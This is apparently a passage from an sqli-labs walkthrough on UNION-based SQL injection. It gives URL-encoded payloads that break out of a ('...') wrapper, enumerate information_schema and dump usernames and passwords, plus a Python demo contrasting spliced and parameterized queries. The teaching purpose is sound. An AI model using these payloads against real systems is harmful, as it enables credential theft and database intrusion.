Before that, first observe what happens when the following statement is run directly on the MySQL database:
Then:
So far we have seen the id parameter wrapped in three different ways: as a bare integer / '' / ('').
We can use this observation to construct the matching payload.
①: Submitting ?id=' directly produces the following error:
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '''') LIMIT 0,1' at line 1
The fragment `') LIMIT 0,1` leaking in the error tells us the query wraps our input in a quoted, parenthesized value, i.e. something of the form: SELECT login_name, password FROM table WHERE id=('our input here') LIMIT 0,1. So to break out we need to close the quote and the parenthesis: `')`.
②: Now build the payload:
?id=-1%27)%20union%20select%201,database(),3--+ (information gathering: returns the current database name)
The UNION must select the same number of columns as the original query (three here, established by earlier probing); otherwise MySQL answers with "The used SELECT statements have a different number of columns". The trailing `--+` decodes to `-- ` (the `+` becomes a space), which is the form MySQL requires for a `--` comment, so the rest of the original query, `') LIMIT 0,1`, is ignored.
③: Next, enumerate the schema through information_schema, which MySQL 5.0 and later expose:
?id=-1%27)union%20select%201,group_concat(table_name),3%20from%20information_schema.tables%20where%20table_schema=%27security%27--+ (tables in the `security` database)
?id=-1%27)union%20select%201,group_concat(column_name),3%20from%20information_schema.columns%20where%20table_name=%27users%27--+ (columns of `users`; filtering only on table_name will also match a `users` table in any other schema, so add `and table_schema='security'` if the output looks mixed)
?id=-1%27)union%20select%201,group_concat(username),group_concat(password)%20from%20security.users--+ (dump usernames and passwords)
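To make the three steps above concrete, here is an added example (not code from the original page or from sqli-labs) that mimics the vulnerable concatenation, renders what each URL-encoded payload turns into after decoding, and runs the final dump against a constructed stand-in table. SQLite stands in for MySQL, so the `database()` and `information_schema` payloads are only rendered, not executed; the query template, the `security.users` rows and the function names are assumptions. The parameterized variant at the end shows the same input failing to inject once it is bound instead of spliced.

```python
import sqlite3
from urllib.parse import unquote_plus

# Assumed query shape, inferred from the leaked "') LIMIT 0,1" fragment:
# the id is wrapped in ('...') and followed by LIMIT 0,1.
TEMPLATE = "SELECT * FROM users WHERE id=('%s') LIMIT 0,1"

# The payloads from the write-up, exactly as they appear in the URL.
PAYLOADS = {
    "closing_quote": "'",
    "db_name": "-1%27)%20union%20select%201,database(),3--+",
    "dump_users": "-1%27)union%20select%201,group_concat(username),"
                  "group_concat(password)%20from%20security.users--+",
}


def render_query(raw_id):
    """Mimic the vulnerable concatenation: URL-decode, then splice.

    %27 -> ', %20 -> space, and the '+' in '--+' -> space, which is what
    makes the '-- ' comment valid and swallows the closing "') LIMIT 0,1".
    """
    return TEMPLATE % unquote_plus(raw_id)


def build_db():
    """Constructed stand-in for the lab's security.users table (SQLite)."""
    con = sqlite3.connect(":memory:")
    # Attach a schema named 'security' so 'security.users' resolves;
    # the unqualified 'users' in the template resolves to the same table.
    con.execute("ATTACH DATABASE ':memory:' AS security")
    con.execute("CREATE TABLE security.users "
                "(id INTEGER, username TEXT, password TEXT)")
    con.executemany("INSERT INTO security.users VALUES (?,?,?)", [
        (1, "Dumb", "Dumb"),            # constructed sample rows
        (2, "Angelina", "I-kill-you"),
        (3, "Dummy", "p@ssword"),
    ])
    return con


def run_vulnerable(con, raw_id):
    """Execute the spliced query; returns the first row or None."""
    return con.execute(render_query(raw_id)).fetchone()


def causes_syntax_error(con, raw_id):
    """True if the spliced query is rejected by the SQL parser (step ①)."""
    try:
        run_vulnerable(con, raw_id)
        return False
    except sqlite3.OperationalError:
        return True


def run_parameterized(con, raw_id):
    """Hardened form: the value is bound, never spliced into the SQL text."""
    sql = "SELECT * FROM users WHERE id=(?) LIMIT 0,1"
    return con.execute(sql, (unquote_plus(raw_id),)).fetchone()


if __name__ == "__main__":
    db = build_db()
    for name, p in PAYLOADS.items():
        print(f"{name}: {render_query(p)}")
    print("step ① syntax error:", causes_syntax_error(db, PAYLOADS["closing_quote"]))
    print("step ③ dump (vulnerable):", run_vulnerable(db, PAYLOADS["dump_users"]))
    print("step ③ dump (parameterized):", run_parameterized(db, PAYLOADS["dump_users"]))
```

Running it prints the decoded SQL for each payload, shows the lone `'` breaking the parser exactly as in step ①, and returns the whole user table as one row through the UNION; the bound version returns nothing because the payload is compared as a literal id value.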